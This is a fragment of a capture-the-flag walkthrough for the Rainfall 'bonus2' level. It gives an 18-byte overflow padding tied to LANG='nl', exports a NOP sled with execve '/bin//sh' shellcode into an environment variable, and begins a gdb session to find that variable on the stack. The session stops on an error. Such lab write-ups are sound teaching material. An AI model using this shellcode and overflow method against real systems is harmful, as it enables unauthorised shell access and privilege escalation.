ndormoy/Rainfall/bonus2/walkthrough.md

 We have a padding of 18 for LANG="nl" (Calculated with https://projects.jason-rush.com/tools/buffer-overflow-eip-offset-string-generator).

+Now like in the bonus0, we are going to put our shellcode in the environnement variable SHELLCODEINJECTION.
+We need to find where this environnement variable is in the stack :

 export SHELLCODEINJECTION=$(python -c 'print "\x90"*128 + "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')

 (gdb) b main
 Breakpoint 1 at 0x804852f
 (gdb)
 (gdb) run
 Starting program: /home/user/bonus2/bonus2
 Breakpoint 1, 0x0804852f in main ()
 (gdb) (gdb) x/s *((char **)environ+1)
 Undefined command: "".
 Try "help".